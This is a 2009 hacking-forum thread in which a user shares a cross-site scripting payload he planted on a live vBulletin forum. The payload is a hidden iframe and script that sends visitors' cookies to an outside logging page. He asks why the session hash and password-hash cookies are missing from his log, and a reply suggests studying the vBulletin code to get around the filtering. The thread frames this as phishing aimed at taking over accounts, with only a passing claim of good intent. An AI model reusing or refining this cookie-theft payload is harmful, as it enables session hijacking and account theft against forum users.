Follow us on Twitter!
The important thing is not to stop questioning. - Albert Einstein
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 24
Guests Online: 23
Members Online: 1

Registered Members: 82839
Newest Member: fezphantom
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

Logging vBulletin session cookies


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-03-09 13:58
I've found an exploit on a vBulletin forum, I'm using an iframe to log the cookies...something like:
Code

<iframe frameborder=0 src="" height=0 width=0 id="lol" name="lol"></iframe>
<script>
frames["lol"].location.href="http://www.xxxxxx.com/imagex/image.php?image=" + document.cookie;
</script>




So far so good, the strange thing is when I'm checking my cookie data file is that it doesn't log the bbpassword, userid and session hash...which basically sucks big time, the only stuff it logs is:

imagevbulletin_collapse=; IDstack=,24036,,42160,; __utma=188577343.2387310957089858000.1224555432.1237116882.1237133536.756; __utmz=188577343.1237076987.752.22.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=xxxxxxx; ebNewBandWidth_.forum.xxxxxxxxxxxx.com=2826:1236415128565; __utmb=188577343.91.10.1237133536; bblastvisit=1237133941; bblastactivity=0;

However when I visit the phishing page myself I do get those cookies except the session hash...wtf is going on?


Author

RE: Logging vBulletin session cookies

AldarHawk
Member



Posts: 1690
Location: Canada
Joined: 26.01.06
Rank:
Hacker Level 1
Posted on 16-03-09 17:57
Sounds like your Phishing is not working Pfft

The iframe pass through must be dropping the cookie which is dependent in vB...look to me like a classic cookie code that stops stuff like this from happening. Do you know the vB backend code?

If you read into this code you will then be able to see where your problem is arising from so you can surpass this problem, perhaps even drop it as it may not work.

Just my thoughts though.

BTW: What are you gaining from this Phishing scheme? Account passwords? What good does that do you? You have an account there already...If you are looking to gain administrative rights, what is that going to do for you? Just wondering you motives to this "hack".


Just ask Yahoo!Taboo! http://www.erikwestlake.com
Author

RE: Logging vBulletin session cookies


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-03-09 18:18
AldarHawk wrote:
Sounds like your Phishing is not working Pfft

The iframe pass through must be dropping the cookie which is dependent in vB...look to me like a classic cookie code that stops stuff like this from happening. Do you know the vB backend code?

If you read into this code you will then be able to see where your problem is arising from so you can surpass this problem, perhaps even drop it as it may not work.

Just my thoughts though.

Thanks, I'll take a look at the vBulletin code, didn't know it was actually possible to filter cookies from output.
AldarHawk wrote:
BTW: What are you gaining from this Phishing scheme? Account passwords? What good does that do you? You have an account there already...If you are looking to gain administrative rights, what is that going to do for you? Just wondering you motives to this "hack".

When I output the cookie with alert(), there are three interesting cookies(session hash, bbpassword(md5), userid).
I'm not going to do anything harmful as I like the board and visit it very often, just want to show the admin why it's a bad idea to allow html on a public forum.Wink


Author

RE: Logging vBulletin session cookies

AldarHawk
Member



Posts: 1690
Location: Canada
Joined: 26.01.06
Rank:
Hacker Level 1
Posted on 16-03-09 18:22
zomgwtfbbq wrote:
When I output the cookie with alert(), there are three interesting cookies(session hash, bbpassword(md5), userid).
I'm not going to do anything harmful as I like the board and visit it very often, just want to show the admin why it's a bad idea to allow html on a public forum.Wink


Okay so this is a basic set up. It is not fully bad to allow HTML. It just needs to be filtered. sessionhash is nothing more than an SQL depsoit with the given "session" code. This relates to the bbpassword() and userid() information. with all three you can gain a lot but I am guessing this is already thought of from vBulletin Smile Anywho, glad you are starting to learn from this zomg Pfft


Just ask Yahoo!Taboo! http://www.erikwestlake.com